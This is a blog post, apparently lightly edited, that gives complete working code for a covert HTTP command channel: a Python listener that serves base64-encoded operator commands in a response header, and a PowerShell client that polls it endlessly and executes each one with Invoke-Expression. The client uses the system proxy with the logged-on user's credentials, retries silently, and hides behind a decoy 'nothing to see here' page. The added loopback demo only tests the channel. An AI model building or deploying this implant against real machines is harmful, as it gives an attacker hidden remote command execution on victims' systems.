Creating a simple HTTP-based PowerShell reverse shell
February 4, 2015
Truth is, it's not that difficult. All you need are two components: a client and a server.
The server is a relatively simple bit of Python code. For every request it receives, it reads a command from the operator, base64-encodes it, and returns it in a custom CMD response header; the client decodes that header and executes it. Base64 is what makes this work: a raw header value cannot carry newlines or arbitrary non-ASCII text, so multi-line PowerShell has to be wrapped before it goes into the header.
```python
# Python 3 port of the original listener (the post's version used the Python 2
# BaseHTTPServer / raw_input / print-statement forms; behaviour is unchanged).
from http.server import BaseHTTPRequestHandler, HTTPServer
import base64

PORT_NUMBER = 8080


class myHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        # read the next command from the operator and base64-encode it so it
        # is safe to carry in a header value
        CMD = base64.b64encode(input("CMD: >> ").encode("utf-8")).decode("ascii")
        self.send_header('CMD', CMD)
        self.end_headers()
        self.wfile.write(b"<html><body>nothing to see here</body></html>")
        return


try:
    server = HTTPServer(('', PORT_NUMBER), myHandler)
    server.serve_forever()
except KeyboardInterrupt:
    print('^C received, shutting down the web server')
    server.socket.close()
```
The client, on the other hand, just sits there polling for commands and executing them. It does not send any output back, so it is blind, and because the channel is plain HTTP every command travels in cleartext (hence SSL on the wish list below). If it can't connect, it retries in a loop forever. Note that the original client assigned the undefined variable $proxy to the request instead of the $p it had just configured, so the proxy settings were never actually applied; that is fixed here.
```powershell
while ($true) {
    try {
        $url = "http://x.x.x.x:8080/p"
        # go through the system proxy and use the logged-on user's default
        # credentials if the proxy demands authentication
        $req = [System.Net.HttpWebRequest]::Create($url)
        $p = [System.Net.WebRequest]::GetSystemWebProxy()
        $p.Credentials = [System.Net.CredentialCache]::DefaultCredentials
        $req.Proxy = $p          # the original assigned the undefined $proxy here
        # add our header
        $req.Headers.Add('CMD', 'INITIAL')
        $res = $req.GetResponse()
        $x = $res.GetResponseHeader("CMD")
        # decode base64
        $d = [System.Convert]::FromBase64String($x)
        $Ds = [System.Text.Encoding]::UTF8.GetString($d)
        # exec whatever we gave it (can be PowerShell or just shell commands)
        Invoke-Expression $Ds
        $res.Close()
    } catch {
        # listener down, proxy error or the command itself threw: wait and retry
        Start-Sleep -Seconds 5
    }
}
```
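To see the two halves talk to each other without a second machine, here is an added example (not code from the original post): an in-process round trip of the header command channel described above. A small Python stand-in plays the PowerShell client (GET /p with a CMD: INITIAL request header, then read and base64-decode the CMD response header), and the listener is the post's handler with the interactive prompt swapped for a queue of constructed sample commands. It assumes a loopback listener on an OS-assigned port instead of the post's fixed 8080, and it bypasses any system proxy so the test is self-contained; the sample commands, including a multi-line one with a non-ASCII character, are constructed for the demo.

```python
"""Added example: in-process round trip of the base64-in-header command channel.
Not the original post's code. Assumptions: loopback listener on port 0, a queue
of constructed commands in place of the operator's keyboard, proxies disabled."""
import base64
import queue
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


def encode_cmd(cmd: str) -> str:
    """Base64 over UTF-8: header values cannot carry newlines or arbitrary
    non-ASCII, so this is what lets multi-line PowerShell ride in one header."""
    return base64.b64encode(cmd.encode("utf-8")).decode("ascii")


def decode_cmd(header_value: str) -> str:
    """Mirror of the client's FromBase64String + UTF8.GetString."""
    return base64.b64decode(header_value).decode("utf-8")


class QueuedHandler(BaseHTTPRequestHandler):
    """Same response shape as the post's handler, but the command comes from a
    queue attached to the server object (constructed tasking, not a prompt)."""

    def do_GET(self):
        try:
            cmd = self.server.commands.get_nowait()
        except queue.Empty:
            cmd = ""  # nothing queued: hand the client an empty command
        self.send_response(200)
        self.send_header("CMD", encode_cmd(cmd))
        self.end_headers()
        self.wfile.write(b"<html><body>nothing to see here</body></html>")

    def log_message(self, *args):  # keep the demo quiet
        pass


def poll_once(url: str) -> str:
    """One iteration of the PowerShell client's loop: GET with the CMD: INITIAL
    request header, return the decoded CMD response header. The real client goes
    through the system proxy; here proxies are disabled (assumption) so the
    loopback request never leaves the host."""
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    req = urllib.request.Request(url, headers={"CMD": "INITIAL"})
    with opener.open(req, timeout=5) as res:
        return decode_cmd(res.headers["CMD"])


def run_exchange(commands):
    """Stand up the listener on 127.0.0.1, poll once per queued command and
    return the commands exactly as the client decoded them."""
    server = HTTPServer(("127.0.0.1", 0), QueuedHandler)
    server.commands = queue.Queue()
    for cmd in commands:
        server.commands.put(cmd)
    worker = threading.Thread(target=server.serve_forever, daemon=True)
    worker.start()
    try:
        url = "http://127.0.0.1:%d/p" % server.server_address[1]
        return [poll_once(url) for _ in commands]
    finally:
        server.shutdown()
        server.server_close()


# Constructed sample tasking. The second entry is multi-line and the third has a
# non-ASCII character; neither could be sent as a raw header value.
SAMPLE_COMMANDS = [
    "whoami",
    "Get-Process | Select-Object -First 3\nGet-Date",
    "Write-Output 'héllo'",
]

if __name__ == "__main__":
    for received in run_exchange(SAMPLE_COMMANDS):
        print(repr(received))
```

The client side here stops at decoding; on the real client that string is what goes straight into Invoke-Expression, which is why anyone who can sit between the client and the listener on this plain-HTTP channel can substitute their own command.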
I intended to improve it and add some features like:
* SSL
* Output transmission
* Ability to ‘run-as’
* Error handling